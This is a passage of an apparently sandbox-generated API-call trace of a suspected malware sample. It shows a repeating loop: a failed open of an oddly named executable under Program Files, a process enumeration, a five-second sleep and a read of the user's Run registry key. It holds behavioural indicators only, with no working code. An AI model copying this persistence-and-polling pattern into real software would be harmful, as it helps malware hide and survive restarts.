NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.261] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.262] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0285.262] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.262] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.262] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0285.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0285.266] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0285.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0285.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0285.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0285.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.415] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0285.419] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0285.420] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0285.420] NtClose (Handle=0x338) returned 0x0 [0285.420] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.420] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.421] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0285.421] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.421] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.421] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de120) returned 1 [0285.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0285.421] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0285.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0285.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0285.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0285.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.608] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0285.609] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0285.610] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0285.610] NtClose (Handle=0x338) returned 0x0 [0285.610] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.610] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.610] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0285.610] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.611] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.611] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de820) returned 1 [0285.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0285.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0285.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0285.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0285.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0285.768] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.769] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0285.770] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0285.772] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0285.772] NtClose (Handle=0x338) returned 0x0 [0285.772] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.773] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.773] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0285.773] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.773] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.773] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0285.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0285.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0285.776] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0285.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0285.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0285.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0285.950] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0285.951] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0285.953] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0285.953] NtClose (Handle=0x338) returned 0x0 [0285.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.953] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.953] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de6a0) returned 1 [0285.953] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0285.954] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0285.954] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deaa0) returned 1 [0285.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0285.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0285.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0285.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0285.958] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0286.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0286.143] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0286.146] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0286.147] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0286.147] NtClose (Handle=0x338) returned 0x0 [0286.147] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.147] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.148] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de4a0) returned 1 [0286.148] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.148] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.148] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0286.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0286.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0286.152] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0286.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0286.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0286.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0286.297] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0286.298] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0286.300] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0286.300] NtClose (Handle=0x338) returned 0x0 [0286.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.300] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.300] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0286.300] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0286.300] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0286.300] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0286.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0286.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0286.303] NtFreeVirtualMemory 